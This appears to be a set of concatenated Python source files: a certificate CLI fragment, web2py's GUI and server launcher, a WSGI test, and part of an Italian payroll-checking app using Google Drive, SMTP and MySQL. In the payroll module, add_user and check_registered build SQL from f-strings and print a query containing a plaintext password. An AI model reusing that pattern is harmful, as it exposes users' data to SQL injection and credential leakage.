"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_mkcert(workingdir, args.name)
elif args.command == 'pkg':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_certpkg(workingdir, args.name, args.insecure)
elif args.command == 'revoke':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_revoke(workingdir, args.name)
elif args.command == 'listen':
if args.name is None:
args.name = os.path.join(workingdir, 'RevocationNotifier-cert.crt')
logger.warning("using default name for revocation cert %s",
args.name)
cmd_listen(workingdir, args.name)
else:
logger.error("Invalid command: %s", args.command)
parser.print_help()
sys.exit(-1)
|
widget.py
|
# -*- coding: utf-8 -*-
# vim: set ts=4 sw=4 et ai:
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
GUI widget and services start function
--------------------------------------
"""
from __future__ import print_function
import time
import sys
import os
from collections import OrderedDict
import socket
import threading
import math
import logging
import signal
import getpass
from gluon.fileutils import read_file, create_welcome_w2p
from gluon.shell import die, run, test
from gluon._compat import PY2, xrange
from gluon.utils import (getipaddrinfo, is_loopback_ip_address,
is_valid_ip_address)
from gluon.console import is_appdir, console
from gluon import newcron
from gluon import main
from gluon.settings import global_settings
ProgramName = 'web2py Web Framework'
ProgramAuthor = 'Created by Massimo Di Pierro, Copyright 2007-' + str(
time.localtime().tm_year)
ProgramVersion = read_file('VERSION').rstrip()
if sys.version_info < (2, 7) or (3, 0) < sys.version_info < (3, 5):
from platform import python_version
sys.stderr.write("Warning: web2py requires at least Python 2.7/3.5"
" but you are running %s\n" % python_version())
def run_system_tests(options):
"""
Runs unittests for gluon.tests
"""
# see "python -m unittest -h" for unittest options help
# NOTE: someone might be interested either in using the
# -f (--failfast) option to stop testing on first failure, or
# in customizing the test selection, for example to run only
# 'gluon.tests.<module>', 'gluon.tests.<module>.<class>' (this
# could be shortened as 'gluon.tests.<class>'), or even
# 'gluon.tests.<module>.<class>.<method>' (or
# the shorter 'gluon.tests.<class>.<method>')
call_args = ['-m', 'unittest', '-c', 'gluon.tests']
if options.verbose:
call_args.insert(-1, '-v')
if options.with_coverage:
try:
import coverage
except:
die('Coverage not installed')
if not PY2:
sys.stderr.write('Experimental ')
sys.stderr.write("Python %s\n" % sys.version)
if options.with_coverage:
coverage_exec = 'coverage2' if PY2 else 'coverage3'
coverage_config_file = os.path.join('gluon', 'tests', 'coverage.ini')
coverage_config = os.environ.setdefault("COVERAGE_PROCESS_START",
coverage_config_file)
run_args = [coverage_exec, 'run', '--rcfile=%s' % coverage_config]
# replace the current process
os.execvpe(run_args[0], run_args + call_args, os.environ)
else:
run_args = [sys.executable]
# replace the current process
os.execv(run_args[0], run_args + call_args)
def get_url(host, path='/', proto='http', port=80):
if ':' in host:
host = '[%s]' % host
elif host == '0.0.0.0':
host = '127.0.0.1'
if path.startswith('/'):
path = path[1:]
if proto.endswith(':'):
proto = proto[:-1]
if not port or port == 80:
port = ''
else:
port = ':%s' % port
return '%s://%s%s/%s' % (proto, host, port, path)
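# e.g. get_url('0.0.0.0', port=8000) -> 'http://127.0.0.1:8000/'
#      get_url('::1', proto='https', port=8443) -> 'https://[::1]:8443/'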
def start_browser(url, startup=False):
if startup:
print('please visit:')
print('\t' + url)
print('starting browser...')
try:
import webbrowser
webbrowser.open(url)
except:
print('warning: unable to detect your browser')
class web2pyDialog(object):
""" Main window dialog """
def __init__(self, root, options):
""" web2pyDialog constructor """
if PY2:
import Tkinter as tkinter
import tkMessageBox as messagebox
else:
import tkinter
from tkinter import messagebox
root.withdraw()
bg_color = 'white'
self.root = tkinter.Toplevel(root, bg=bg_color)
self.root.resizable(0, 0)
self.root.title(ProgramName)
self.options = options
self.scheduler_processes_lock = threading.RLock()
self.scheduler_processes = OrderedDict()
iconphoto = os.path.join('extras', 'icons', 'web2py.gif')
if os.path.exists(iconphoto):
img = tkinter.PhotoImage(file=iconphoto)
self.root.tk.call('wm', 'iconphoto', self.root._w, img)
# Building the Menu
self.menu = tkinter.Menu(self.root)
servermenu = tkinter.Menu(self.menu, tearoff=0)
httplog = os.path.join(options.folder, options.log_filename)
item = lambda: start_browser(httplog)
servermenu.add_command(label='View httpserver.log',
command=item)
servermenu.add_command(label='Quit (pid:%i)' % os.getpid(),
command=self.quit)
self.menu.add_cascade(label='Server', menu=servermenu)
self.pagesmenu = tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Pages', menu=self.pagesmenu)
self.schedmenu = tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Scheduler', menu=self.schedmenu)
# register and start schedulers
self.update_schedulers(start=True)
helpmenu = tkinter.Menu(self.menu, tearoff=0)
# Home Page
item = lambda: start_browser('http://www.web2py.com/')
helpmenu.add_command(label='Home Page',
command=item)
# About
ProgramInfo = """%s
%s
%s""" % (ProgramName, ProgramAuthor, ProgramVersion)
item = lambda: messagebox.showinfo('About web2py', ProgramInfo)
helpmenu.add_command(label='About',
command=item)
self.menu.add_cascade(label='Info', menu=helpmenu)
self.root.config(menu=self.menu)
if options.taskbar:
self.root.protocol('WM_DELETE_WINDOW',
lambda: self.quit(True))
else:
self.root.protocol('WM_DELETE_WINDOW', self.quit)
sticky = tkinter.NW
# Prepare the logo area
self.logoarea = tkinter.Canvas(self.root,
background=bg_color,
width=300,
height=300)
self.logoarea.grid(row=0, column=0, columnspan=4, sticky=sticky)
self.logoarea.after(1000, self.update_canvas)
logo = os.path.join('extras', 'icons', 'splashlogo.gif')
if os.path.exists(logo):
img = tkinter.PhotoImage(file=logo)
pnl = tkinter.Label(self.logoarea, image=img, background=bg_color, bd=0)
pnl.pack(side='top', fill='both', expand='yes')
# Prevent garbage collection of img
pnl.image = img
# Prepare the banner area
self.bannerarea = tkinter.Canvas(self.root,
bg=bg_color,
width=300,
height=300)
self.bannerarea.grid(row=1, column=1, columnspan=2, sticky=sticky)
tkinter.Label(self.bannerarea, anchor=tkinter.N,
text=str(ProgramVersion + "\n" + ProgramAuthor),
font=('Helvetica', 11), justify=tkinter.CENTER,
foreground='#195866', background=bg_color,
height=3).pack(side='top',
fill='both',
expand='yes')
self.bannerarea.after(1000, self.update_canvas)
# IP
# retrieves the list of server IP addresses
try:
if_ips = list(set( # no duplicates
[addrinfo[4][0] for addrinfo in getipaddrinfo(socket.getfqdn())
if not is_loopback_ip_address(addrinfo=addrinfo)]))
except socket.gaierror:
if_ips = []
tkinter.Label(self.root,
text='Server IP:', bg=bg_color,
justify=tkinter.RIGHT).grid(row=4,
column=1,
sticky=sticky)
self.ips = {}
self.selected_ip = tkinter.StringVar()
row = 4
ips = [('127.0.0.1', 'Local (IPv4)')] + \
([('::1', 'Local (IPv6)')] if socket.has_ipv6 else []) + \
[(ip, 'Public') for ip in if_ips] + \
[('0.0.0.0', 'Public')]
for ip, legend in ips:
self.ips[ip] = tkinter.Radiobutton(
self.root, bg=bg_color, highlightthickness=0,
selectcolor='light grey', width=30,
anchor=tkinter.W, text='%s (%s)' % (legend, ip),
justify=tkinter.LEFT,
variable=self.selected_ip, value=ip)
self.ips[ip].grid(row=row, column=2, sticky=sticky)
if row == 4:
self.ips[ip].select()
row += 1
shift = row
# Port
tkinter.Label(self.root,
text='Server Port:', bg=bg_color,
justify=tkinter.RIGHT).grid(row=shift,
column=1, pady=10,
sticky=sticky)
self.port_number = tkinter.Entry(self.root)
self.port_number.insert(tkinter.END, options.port)
self.port_number.grid(row=shift, column=2, sticky=sticky, pady=10)
# Password
tkinter.Label(self.root,
text='Choose Password:', bg=bg_color,
justify=tkinter.RIGHT).grid(row=shift + 1,
column=1,
sticky=sticky)
self.password = tkinter.Entry(self.root, show='*')
self.password.bind('<Return>', lambda e: self.start())
self.password.focus_force()
self.password.grid(row=shift + 1, column=2, sticky=sticky)
# Prepare the canvas
self.canvas = tkinter.Canvas(self.root,
width=400,
height=100,
bg='black')
self.canvas.grid(row=shift + 2, column=1, columnspan=2, pady=5,
sticky=sticky)
self.canvas.after(1000, self.update_canvas)
# Prepare the frame
frame = tkinter.Frame(self.root)
frame.grid(row=shift + 3, column=1, columnspan=2, pady=5,
sticky=sticky)
# Start button
self.button_start = tkinter.Button(frame,
text='start server',
command=self.start)
self.button_start.grid(row=0, column=0, sticky=sticky)
# Stop button
self.button_stop = tkinter.Button(frame,
text='stop server',
command=self.stop)
self.button_stop.grid(row=0, column=1, sticky=sticky)
self.button_stop.configure(state='disabled')
if options.taskbar:
import gluon.contrib.taskbar_widget
self.tb = gluon.contrib.taskbar_widget.TaskBarIcon()
self.checkTaskBar()
if options.password != '<ask>':
self.password.insert(0, options.password)
self.start()
self.root.withdraw()
else:
self.tb = None
def update_schedulers(self, start=False):
applications_folder = os.path.join(self.options.folder, 'applications')
available_apps = [
arq for arq in os.listdir(applications_folder)
if os.path.isdir(os.path.join(applications_folder, arq))
]
with self.scheduler_processes_lock:
# reset the menu
# since applications can disappear (be uninstalled) we must
# clear the menu (should use tkinter.END or tkinter.LAST)
self.schedmenu.delete(0, 'end')
for arq in available_apps:
if arq not in self.scheduler_processes:
item = lambda a=arq: self.try_start_scheduler(a)
self.schedmenu.add_command(label="start %s" % arq,
command=item)
if arq in self.scheduler_processes:
item = lambda a=arq: self.try_stop_scheduler(a)
self.schedmenu.add_command(label="stop %s" % arq,
command=item)
if start and self.options.with_scheduler and self.options.schedulers:
# the widget takes care of starting the schedulers
apps = [ag.split(':', 1)[0] for ag in self.options.schedulers]
else:
apps = []
for app in apps:
self.try_start_scheduler(app)
def start_schedulers(self, app):
from multiprocessing import Process
code = "from gluon.globals import current;current._scheduler.loop()"
print('starting scheduler from widget for "%s"...' % app)
args = (app, True, True, None, False, code, False, True)
p = Process(target=run, args=args)
with self.scheduler_processes_lock:
self.scheduler_processes[app] = p
self.update_schedulers()
print("Currently running %s scheduler processes" % (
len(self.scheduler_processes)))
p.start()
print("Processes started")
def try_stop_scheduler(self, app, skip_update=False):
p = None
with self.scheduler_processes_lock:
if app in self.scheduler_processes:
p = self.scheduler_processes[app]
del self.scheduler_processes[app]
if p is not None:
p.terminate()
p.join()
if not skip_update:
self.update_schedulers()
def try_start_scheduler(self, app):
t = None
with self.scheduler_processes_lock:
if not is_appdir(self.options.folder, app):
self.schedmenu.delete("start %s" % app)
return
if app not in self.scheduler_processes:
t = threading.Thread(target=self.start_schedulers, args=(app,))
if t is not None:
t.start()
def checkTaskBar(self):
""" Checks taskbar status """
tb = self.tb
if tb.status:
st0 = tb.status[0]
EnumStatus = tb.EnumStatus
if st0 == EnumStatus.QUIT:
self.quit()
elif st0 == EnumStatus.TOGGLE:
if self.root.state() == 'withdrawn':
self.root.deiconify()
else:
self.root.withdraw()
elif st0 == EnumStatus.STOP:
self.stop()
elif st0 == EnumStatus.START:
self.start()
elif st0 == EnumStatus.RESTART:
self.stop()
self.start()
del tb.status[0]
self.root.after(1000, self.checkTaskBar)
def connect_pages(self):
""" Connects pages """
# reset the menu,
# since applications can disappear (be uninstalled) we must
# clear the menu (should use tkinter.END or tkinter.LAST)
self.pagesmenu.delete(0, 'end')
applications_folder = os.path.join(self.options.folder, 'applications')
available_apps = [
arq for arq in os.listdir(applications_folder)
if os.path.exists(os.path.join(applications_folder, arq, '__init__.py'))
]
for arq in available_apps:
url = self.url + arq
item = lambda a=arq: self.try_start_browser(a)
self.pagesmenu.add_command(
label=url, command=item)
def try_start_browser(self, app):
url = self.url + app
if not is_appdir(self.options.folder, app):
self.pagesmenu.delete(url)
return
start_browser(url)
def quit(self, justHide=False):
""" Finishes the program execution """
if justHide:
self.root.withdraw()
else:
try:
with self.scheduler_processes_lock:
scheds = list(self.scheduler_processes.keys())
for t in scheds:
self.try_stop_scheduler(t, skip_update=True)
except:
pass
if self.options.with_cron and not self.options.soft_cron:
# shutting down hardcron
try:
newcron.stopcron()
except:
pass
try:
# HttpServer.stop takes care of stopping softcron
self.server.stop()
except:
pass
try:
self.tb.Destroy()
except:
pass
self.root.destroy()
sys.exit(0)
def error(self, message):
""" Shows error message """
if PY2:
import tkMessageBox as messagebox
else:
from tkinter import messagebox
messagebox.showerror('web2py start server', message)
def start(self):
""" Starts web2py server """
password = self.password.get()
if not password:
self.error('no password, no web admin interface')
ip = self.selected_ip.get()
if not is_valid_ip_address(ip):
return self.error('invalid host ip address')
try:
port = int(self.port_number.get())
except ValueError:
return self.error('invalid port number')
if self.options.server_key and self.options.server_cert:
proto = 'https'
else:
proto = 'http'
self.url = get_url(ip, proto=proto, port=port)
self.connect_pages()
self.update_schedulers()
# softcron is stopped with HttpServer, thus if starting again
# need to reset newcron._stopping to re-enable cron
if self.options.soft_cron:
newcron.reset()
# FIXME: if the HttpServer is stopped, then started again,
# does not start because of following error:
# WARNING:Rocket.Errors.Port8000:Listener started when not ready.
self.button_start.configure(state='disabled')
try:
options = self.options
req_queue_size = options.request_queue_size
self.server = main.HttpServer(
ip,
port,
password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.server_cert,
ssl_private_key=options.server_key,
ssl_ca_certificate=options.ca_cert,
min_threads=options.min_threads,
max_threads=options.max_threads,
server_name=options.server_name,
request_queue_size=req_queue_size,
timeout=options.timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
threading.Thread(target=self.server.start).start()
except Exception as e:
self.button_start.configure(state='normal')
return self.error(str(e))
if not self.server_ready():
self.button_start.configure(state='normal')
return
self.button_stop.configure(state='normal')
if not options.taskbar:
cpt = threading.Thread(target=start_browser,
args=(get_url(ip, proto=proto, port=port), True))
cpt.setDaemon(True)
cpt.start()
self.password.configure(state='readonly')
for ip in self.ips.values():
ip.configure(state='disabled')
self.port_number.configure(state='readonly')
if self.tb:
self.tb.SetServerRunning()
def server_ready(self):
for listener in self.server.server.listeners:
if listener.ready:
return True
return False
def stop(self):
""" Stops web2py server """
self.button_start.configure(state='normal')
self.button_stop.configure(state='disabled')
self.password.configure(state='normal')
for ip in self.ips.values():
ip.configure(state='normal')
self.port_number.configure(state='normal')
self.server.stop()
if self.tb:
self.tb.SetServerStopped()
def update_canvas(self):
""" Updates canvas """
httplog = os.path.join(self.options.folder, self.options.log_filename)
canvas = self.canvas
try:
t1 = os.path.getsize(httplog)
except OSError:
canvas.after(1000, self.update_canvas)
return
points = 400
try:
pvalues = self.p0[1:]
with open(httplog, 'r') as fp:
fp.seek(self.t0)
data = fp.read(t1 - self.t0)
self.p0 = pvalues + [10 + 90.0 / math.sqrt(1 + data.count('\n'))]
for i in xrange(points - 1):
c = canvas.coords(self.q0[i])
canvas.coords(self.q0[i],
(c[0], self.p0[i],
c[2], self.p0[i + 1]))
self.t0 = t1
except AttributeError:
self.t0 = time.time()
self.t0 = t1
self.p0 = [100] * points
self.q0 = [canvas.create_line(i, 100, i + 1, 100,
fill='green') for i in xrange(points - 1)]
canvas.after(1000, self.update_canvas)
def get_code_for_scheduler(applications_parent, app_groups):
app = app_groups[0]
if not is_appdir(applications_parent, app):
print("Application '%s' doesn't exist, skipping" % app)
return None, None
code = 'from gluon.globals import current;'
if len(app_groups) > 1:
code += "current._scheduler.group_names=['%s'];" % "','".join(
app_groups[1:])
code += "current._scheduler.loop()"
return app, code
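# e.g. get_code_for_scheduler(options.folder, ['myapp', 'fast', 'slow']) returns
# ('myapp', "from gluon.globals import current;"
#           "current._scheduler.group_names=['fast','slow'];current._scheduler.loop()")
# provided applications/myapp exists under options.folder.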
def start_schedulers(options):
from multiprocessing import Process
apps = [ag.split(':') for ag in options.schedulers]
if not options.with_scheduler and len(apps) == 1:
app, code = get_code_for_scheduler(options.folder, apps[0])
if not app:
return
print('starting single-scheduler for "%s"...' % app)
run(app, True, True, None, False, code, False, True)
return
# Work around OS X problem: http://bugs.python.org/issue9405
if PY2:
import urllib
else:
import urllib.request as urllib
urllib.getproxies()
processes = []
for app_groups in apps:
app, code = get_code_for_scheduler(options.folder, app_groups)
if not app:
continue
print('starting scheduler for "%s"...' % app)
args = (app, True, True, None, False, code, False, True)
p = Process(target=run, args=args)
processes.append(p)
print("Currently running %s scheduler processes" % (len(processes)))
p.start()
##to avoid bashing the db at the same time
time.sleep(0.7)
print("Processes started")
for p in processes:
try:
p.join()
except (KeyboardInterrupt, SystemExit):
print("Processes stopped")
except:
p.terminate()
p.join()
def start():
""" Starts server and other services """
# get command line arguments
options = console(version=ProgramVersion)
if options.with_scheduler or len(options.schedulers) > 1:
try:
from multiprocessing import Process
except:
die('Sorry, -K/--scheduler only supported for Python 2.6+')
if options.gae:
# write app.yaml, gaehandler.py, and exit
if not os.path.exists('app.yaml'):
name = options.gae
# for backward compatibility
if name == 'configure':
if PY2: input = raw_input
name = input("Your GAE app name: ")
content = open(os.path.join('examples', 'app.example.yaml'), 'rb').read()
open('app.yaml', 'wb').write(content.replace("yourappname", name))
else:
print("app.yaml alreday exists in the web2py folder")
if not os.path.exists('gaehandler.py'):
content = open(os.path.join('handlers', 'gaehandler.py'), 'rb').read()
open('gaehandler.py', 'wb').write(content)
else:
print("gaehandler.py alreday exists in the web2py folder")
return
logger = logging.getLogger("web2py")
logger.setLevel(options.log_level)
logging.getLogger().setLevel(options.log_level) # root logger
# on new installation build the scaffolding app
create_welcome_w2p()
if options.run_system_tests:
# run system test and exit
run_system_tests(options)
if options.quiet:
# to prevent writes on stdout set a null stream
class NullFile(object):
def write(self, x):
pass
sys.stdout = NullFile()
# but still has to mute existing loggers, to do that iterate
# over all existing loggers (root logger included) and remove
# all attached logging.StreamHandler instances currently
# streaming on sys.stdout or sys.stderr
loggers = [logging.getLogger()]
loggers.extend(logging.Logger.manager.loggerDict.values())
for l in loggers:
if isinstance(l, logging.PlaceHolder): continue
for h in l.handlers[:]:
if isinstance(h, logging.StreamHandler) and \
h.stream in (sys.stdout, sys.stderr):
l.removeHandler(h)
# NOTE: stderr.write() is still working
if not options.no_banner:
# banner
print(ProgramName)
print(ProgramAuthor)
print(ProgramVersion)
from pydal.drivers import DRIVERS
print('Database drivers available: %s' % ', '.join(DRIVERS))
if options.run_doctests:
# run doctests and exit
test(options.run_doctests, verbose=options.verbose)
return
if options.shell:
# run interactive shell and exit
sys.argv = [options.run or ''] + options.args
run(options.shell, plain=options.plain, bpython=options.bpython,
import_models=options.import_models, startfile=options.run,
cron_job=options.cron_job, force_migrate=options.force_migrate,
fake_migrate=options.fake_migrate)
return
# set size of cron thread pools
newcron.dancer_size(options.min_threads)
newcron.launcher_size(options.cron_threads)
if options.cron_run:
# run cron (extcron) and exit
logger.debug('Running extcron...')
global_settings.web2py_crontype = 'external'
newcron.extcron(options.folder, apps=options.crontabs)
return
if not options.with_scheduler and options.schedulers:
# run schedulers and exit
try:
start_schedulers(options)
except KeyboardInterrupt:
pass
return
if options.with_cron:
if options.soft_cron:
print('Using cron software emulation (but this is not very efficient)')
global_settings.web2py_crontype = 'soft'
else:
# start hardcron thread
logger.debug('Starting hardcron...')
global_settings.web2py_crontype = 'hard'
newcron.hardcron(options.folder, apps=options.crontabs).start()
# if no password provided and have Tk library start GUI (when not
# explicitly disabled), we also need a GUI to put in taskbar (system tray)
# when requested
root = None
if (not options.no_gui and options.password == '<ask>') or options.taskbar:
try:
if PY2:
import Tkinter as tkinter
else:
import tkinter
root = tkinter.Tk()
except (ImportError, OSError):
logger.warning(
'GUI not available because Tk library is not installed')
options.no_gui = True
except:
logger.exception('cannot get Tk root window, GUI disabled')
options.no_gui = True
if root:
# run GUI and exit
root.focus_force()
# Mac OS X - make the GUI window rise to the top
if os.path.exists("/usr/bin/osascript"):
applescript = """
tell application "System Events"
set proc to first process whose unix id is %d
set frontmost of proc to true
end tell
""" % (os.getpid())
os.system("/usr/bin/osascript -e '%s'" % applescript)
# web2pyDialog takes care of schedulers
master = web2pyDialog(root, options)
signal.signal(signal.SIGTERM, lambda a, b: master.quit())
try:
root.mainloop()
except:
master.quit()
sys.exit()
spt = None
if options.with_scheduler and options.schedulers:
# start schedulers in a separate thread
spt = threading.Thread(target=start_schedulers, args=(options,))
spt.start()
# start server
if options.password == '<ask>':
options.password = getpass.getpass('choose a password:')
if not options.password and not options.no_banner:
print('no password, no web admin interface')
# Use first interface IP and port if interfaces specified, since the
# interfaces option overrides the IP (and related) options.
if not options.interfaces:
ip = options.ip
port = options.port
else:
first_if = options.interfaces[0]
ip = first_if[0]
port = first_if[1]
if options.server_key and options.server_cert:
proto = 'https'
else:
proto = 'http'
url = get_url(ip, proto=proto, port=port)
if not options.no_banner:
message = '\nplease visit:\n\t%s\n'
if sys.platform.startswith('win'):
message += 'use "taskkill /f /pid %i" to shutdown the web2py server\n\n'
else:
message += 'use "kill -SIGTERM %i" to shutdown the web2py server\n\n'
print(message % (url, os.getpid()))
# enhance linecache.getline (used by debugger) to look at the source file
# if the line was not found (under py2exe & when file was modified)
import linecache
py2exe_getline = linecache.getline
def getline(filename, lineno, *args, **kwargs):
line = py2exe_getline(filename, lineno, *args, **kwargs)
if not line:
try:
with open(filename, "rb") as f:
for i, line in enumerate(f):
line = line.decode('utf-8')
if lineno == i + 1:
break
else:
line = ''
except (IOError, OSError):
line = ''
return line
linecache.getline = getline
server = main.HttpServer(ip=ip,
port=port,
password=options.password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.server_cert,
ssl_private_key=options.server_key,
ssl_ca_certificate=options.ca_cert,
min_threads=options.min_threads,
max_threads=options.max_threads,
server_name=options.server_name,
request_queue_size=options.request_queue_size,
timeout=options.timeout,
socket_timeout=options.socket_timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
try:
server.start()
except KeyboardInterrupt:
server.stop()
if spt is not None:
try:
spt.join()
except:
logger.exception('error terminating schedulers')
logging.shutdown()
|
test_wsgi.py
|
import py
import socket, time
from oejskit import wsgi
#from wsgiref.validate import validator
def test_timeout():
def app(environ, start_response):
start_response('200 OK', [('content-type', 'text/plain')])
return ['stuff\n']
serverSide = wsgi.WSGIServerSide(0)
port = serverSide.get_port()
import threading, urllib2
def get(rel):
try:
return urllib2.urlopen('http://localhost:%d/%s' %
(port, rel)).read()
except urllib2.HTTPError, e:
return e.code, e.fp.read()
results = []
def requests():
results.append(get('whatever'))
threading.Thread(target=requests).start()
serverSide.set_app(app)
t0 = time.time()
py.test.raises(socket.timeout, serverSide.serve_till_fulfilled, None, 3)
t1 = time.time()
assert results == ['stuff\n']
assert 3.0 <= (t1 - t0) <= 6.0
def test_integration():
calls = []
def app(environ, start_response):
path_info = environ['PATH_INFO']
if 'stop' in path_info:
start_response('200 OK', [('content-type', 'text/plain')])
environ['oejskit.stop_serving']()
return ['ok\n']
if not path_info.startswith('/x'):
start_response('404 Not Found', [('content-type',
'text/plain')])
return ["WHAT?\n"]
calls.append((environ['REQUEST_METHOD'], path_info))
start_response('200 OK', [('content-type', 'text/plain')])
return ['hello\n']
def other(environ, start_response):
path_info = environ['PATH_INFO']
if path_info == '/other':
start_response('200 OK', [('content-type', 'text/plain')])
return ['OTHER\n']
start_response('404 Not Found', [('content-type',
'text/plain')])
return ["???\n"]
serverSide = wsgi.WSGIServerSide(0)
port = serverSide.get_port()
import threading, urllib2
def get(rel):
try:
return urllib2.urlopen('http://localhost:%d/%s' %
(port, rel)).read()
except urllib2.HTTPError, e:
return e.code, e.fp.read()
done = threading.Event()
results = []
def requests():
results.append(get('x'))
results.append(get('other'))
get('stop')
done.set()
threading.Thread(target=requests).start()
serverSide.set_app(app)
serverSide.serve_till_fulfilled(other, 60)
done.wait()
assert results[0] == 'hello\n'
assert results[1] == 'OTHER\n'
|
appLib.py
|
import os
import copy
import io
import re
import pickle
import fitz # PyMuPDF
import json
import mysql.connector
import smtplib
import openpyxl
import xlrd
import datetime
import holidays
import random
import pandas as pd
import numpy as np
from openpyxl.utils.cell import get_column_letter
from openpyxl.styles import PatternFill, Alignment, Border, Side
from openpyxl.worksheet.datavalidation import DataValidation
from openpyxl import formatting
from threading import Thread
from operator import itemgetter
from googleapiclient.http import MediaIoBaseDownload
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request, AuthorizedSession
from email.message import EmailMessage
from email.mime.text import MIMEText
# PATHS
db_config_path = "../config_files/db/config.json"
email_config_path = "../config_files/email_service/config.json"
google_config_path = "../config_files/google/google_userconfig.json"
logo_path = "../config_files/imgs/BusinessCat.png"
icon_path = "../config_files/imgs/Cat.ico"
# COLORS
default_background = "#ffffff"
color_light_orange = "#fff6e5"
color_green = "#009922"
color_yellow = "#ffe01a"
color_red = "#ff3333"
color_orange = "#e59345"
color_grey = "#e3e3e3"
# GOOGLE VARIABLES
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = '../config_files/google/google_credentials.json'
creds = None
SCOPE = [
'https://www.googleapis.com/auth/drive'
]
''' UTILITIES '''
def START_in_Thread(process):
"""prevent process to freeze the app upon launch"""
Thread(target=process).start()
def check_paycheck_badges():
done_paycheck = False
done_badges = False
if os.path.exists("BUSTE PAGA"):
if len(os.listdir("BUSTE PAGA")) > 0:
done_paycheck = True
if os.path.exists("CARTELLINI"):
if len(os.listdir("CARTELLINI")) > 0:
done_badges = True
check = (done_paycheck, done_badges)
return check
def get_sheetnames_from_bytes(bytes_):
""" open bytestream as openpyxl workbooks and return an array of worksheet names """
wb = openpyxl.load_workbook(bytes_)
sheetnames = wb.sheetnames
return sheetnames
''' GOOGLE API METHODS '''
def authenticate(func):
def auth_wrapper(*args, **kwargs):
global creds
global SCOPE
# load token.pickle if present
if os.path.exists('../config_files/google/token.pickle'):
with open('../config_files/google/token.pickle', 'rb') as token:
creds = pickle.load(token)
if not creds or not creds.valid:
# ? if token needs to be refreshed it will be refreshed
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
# ? otherwise authenticate
else:
flow = InstalledAppFlow.from_client_secrets_file(os.environ['GOOGLE_APPLICATION_CREDENTIALS'], SCOPE)
creds = flow.run_local_server(port=0)
with open('../config_files/google/token.pickle', 'wb') as token:
pickle.dump(creds, token)
# raise if user does not authenticate
if not creds:
raise Exception("You are not allowed to run this method >> Unauthorized")
return func(*args, **kwargs)
return auth_wrapper
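# Any function decorated with @authenticate runs with a valid `creds` object:
# loaded from token.pickle when present, refreshed if expired, or obtained through
# the local-server OAuth flow and cached back to token.pickle.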
@authenticate
def create_auth_session(credentials=None):
# default to the module-level creds set up by the authenticate decorator
return AuthorizedSession(credentials or creds)
@authenticate
def build_service(service, version="v3"):
return build(service, version, credentials=creds)
def get_df_bytestream(ID):
"""
get google sheet for comparison. return it as a bytestream
"""
service = build_service("drive")
conversion_table = service.about().get(fields="exportFormats").execute()
request = service.files().export_media(fileId=ID,
mimeType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet")
fh = io.BytesIO()
# download file bytestream
downloader = MediaIoBaseDownload(fh, request)
done = False
while not done:
status, done = downloader.next_chunk()
return fh
def get_comparison_df(bytestream, month):
"""
parse bytestream as a pandas dataframe
"""
# parse bytestream into df
df = pd.read_excel(bytestream, sheet_name=month.upper(), index_col=0)
return df
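# Usage sketch (sheet_id is a hypothetical Drive file id; the month must match an
# upper-case worksheet tab in the exported workbook):
#   fh = get_df_bytestream(sheet_id)
#   df = get_comparison_df(fh, "gennaio")   # reads sheet "GENNAIO"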
def get_sheetlist():
"""
get google sheet list in google drive
"""
service = build_service("drive")
results = service.files().list(pageSize=10, fields="nextPageToken, files(id, name, mimeType)", q="mimeType='application/vnd.google-apps.spreadsheet'").execute()
items = results.get('files', [])
items = sorted(items, key=itemgetter('name'))
return items
''' MAILS '''
def load_email_server_config():
try:
with open(email_config_path, 'r') as f:
config = json.load(f)
return config
except:
raise Exception("Cannot find email server config file")
def connect_to_mail_server():
config = load_email_server_config()
smtp = smtplib.SMTP_SSL(config['server'], config['port'], timeout=10)
smtp.ehlo()
try:
smtp.login(config['email'], config['password'])
print(f"""CONNECTED SUCCESSFULLY:\n
-> SERVER {config['server']}\n
-> PORT {config['port']}\n
-> USER {config['email']}\n
-> PWD {"*"*len(str(config['password']))}
""")
except:
raise Exception("Login al server non riuscito")
return smtp
''' DB UTILS '''
def load_db_config():
try:
with open(db_config_path, "r") as f:
config = json.load(f)
except:
raise Exception("Cannot find db config file")
return config
def connect_to_db(config):
db = mysql.connector.connect(
host=config['host'],
password=config['password'],
username=config['username'],
database=config['database'],
port=config['port']
)
return db
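# The db config file is expected to provide the keys used above, e.g. (illustrative):
#   {"host": "localhost", "port": 3306, "username": "user",
#    "password": "secret", "database": "businesscat"}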
def add_user(db, cursor, email, pwd, product_key, workstations):
workstations = json.dumps(workstations)
task = f"INSERT INTO users (email, pwd, product_key, workstations) VALUES ('{email}','{pwd}','{product_key}','{workstations}')"
print(task)
cursor.execute(task)
print(f"-> user added")
db.commit()
return cursor
def check_registered(cursor, email):
already_registered = False
task = f"SELECT * FROM users WHERE email = '{email}'"
cursor.execute(task)
if cursor.fetchone():
already_registered = True
return already_registered
''' CLASSES '''
class PaycheckController():
def __init__(self):
"""
paychecks_to_check (str) -> path to the multi-page pdf containing all paychecks to check
badges_to_check (str) -> path to the folder containing all badge files as .pdf
"""
"""
try:
self.__validate_data(paychecks_to_check, badges_to_check)
except Exception() as e:
raise Exception(e)
"""
self.badges_path = "" # path to CARTELLINI folder
self.paychecks_to_check = "" # lul_controllo
self.conversion_table_path = "../config_files/conversion_table.json"
self.verify_filename = "Verifica.xlsx" #name of the output verification xlsx
self.highlight_error = "FFFFFFFF"
self.default_configuration = {
"col_codes": {},
"col_to_extract": [
"Z01100",
